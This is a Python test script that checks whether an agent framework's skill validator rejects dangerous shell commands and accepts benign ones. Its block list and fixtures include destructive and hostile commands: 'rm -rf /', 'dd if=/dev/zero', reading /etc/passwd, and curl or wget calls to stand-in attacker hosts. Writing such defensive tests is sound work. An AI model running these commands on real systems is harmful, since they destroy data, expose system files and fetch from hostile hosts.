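#!/usr/bin/env python3
"""
Test script to verify the security fix for skill content validation.

This test only exercises ``HermesAgent._validate_skill_content`` directly,
without database dependencies.  It can be run as a script or collected by
pytest (the entry point is named ``test_*``).
"""
import os
import sys

# Add the harnessed_agent module to the path.  abspath() keeps the entry
# correct even when __file__ is a relative path (e.g. an unusual launcher),
# in which case dirname() alone would yield '' and depend on the cwd.
sys.path.insert(
    0,
    os.path.join(os.path.abspath(os.path.dirname(__file__)), "harnessed_agent"),
)

from core import HermesAgent  # noqa: E402  (must follow the sys.path edit)

# Shell fragments the validator is expected to reject.  These are spot checks
# of the validator's rules, not an exhaustive catalogue; keep the list in step
# with the validator whenever its rules change.  The trailing space in "sudo "
# is deliberate and must be preserved.
DANGEROUS_PATTERNS = [
    "rm -rf /",
    "cat /etc/passwd",
    "wget http://malicious.com",
    "curl http://attacker.com",
    "sudo ",
    "chmod 777",
    "dd if=/dev/zero",
]

# Benign commands that must keep passing, so the rules do not become so broad
# that ordinary skills are blocked.
SAFE_PATTERNS = [
    "echo hello",
    "ls -la",
    "pwd",
    "date",
    "whoami",
]


def _skill_document(name: str, description: str, steps: list[str]) -> str:
    """Build a minimal skill document in the shape these tests feed the validator.

    Args:
        name: value for the ``name`` field.
        description: value for the ``description`` field.
        steps: one entry per ``steps`` list item, written verbatim.

    Returns:
        The document text.  A leading newline is kept to match the original
        triple-quoted literals this helper replaces; building the text with
        explicit joins keeps its indentation independent of the code's.
    """
    lines = [
        f"name: {name}",
        f"description: {description}",
        "version: 1.0.0",
        "steps:",
    ]
    lines.extend(f"  - {step}" for step in steps)
    return "\n" + "\n".join(lines) + "\n"


def _assert_validation(agent, label: str, content: str, expected: bool) -> None:
    """Run the validator on *content* and assert it returns exactly *expected*.

    ``is`` rather than ``==`` pins the bool contract of the validator: a
    ``None`` or other falsy value coming out of an error path must not be
    mistaken for a deliberate rejection, and a truthy non-bool must not be
    mistaken for acceptance.

    Args:
        agent: the ``HermesAgent`` whose ``_validate_skill_content`` is tested.
        label: human-readable name of the case, used in output and messages.
        content: the skill document handed to the validator.
        expected: ``True`` if the document must be accepted, else ``False``.

    Raises:
        AssertionError: when the validator's verdict differs from *expected*.
    """
    result = agent._validate_skill_content(content)
    print(f"{label} validation result: {result}")
    verdict = "accepted" if expected else "rejected"
    assert result is expected, f"{label} should be {verdict}"


def test_security_fix() -> None:
    """Test that malicious skill content is rejected by the validation method."""
    agent = HermesAgent()

    # Test 1: Valid skill content should be accepted
    _assert_validation(
        agent,
        "Valid skill",
        _skill_document(
            "test-skill",
            "A valid test skill",
            ['Use terminal to run echo "hello"', "Return success"],
        ),
        True,
    )

    # Test 2: Malicious skill content with dangerous commands should be rejected
    _assert_validation(
        agent,
        "Malicious skill",
        _skill_document(
            "malicious-skill",
            "A malicious skill",
            [
                "Use terminal to run rm -rf / # This should be blocked",
                "Use terminal to run cat /etc/passwd # This should be blocked",
            ],
        ),
        False,
    )

    # Test 3: Empty content should be rejected
    _assert_validation(agent, "Empty skill", "", False)

    # Test 4: Each dangerous pattern on its own should be rejected, so a
    # failure names the exact rule that regressed rather than the whole set.
    for pattern in DANGEROUS_PATTERNS:
        _assert_validation(
            agent,
            f"Dangerous pattern '{pattern}'",
            _skill_document(
                "dangerous-skill",
                "A dangerous skill",
                [f"Use terminal to run {pattern}"],
            ),
            False,
        )

    # Test 5: Safe content should be accepted (guards against over-blocking)
    for pattern in SAFE_PATTERNS:
        _assert_validation(
            agent,
            f"Safe pattern '{pattern}'",
            _skill_document(
                "safe-skill",
                "A safe skill",
                [f"Use terminal to run {pattern}"],
            ),
            True,
        )

    print("All security tests passed!")


if __name__ == "__main__":
    test_security_fix()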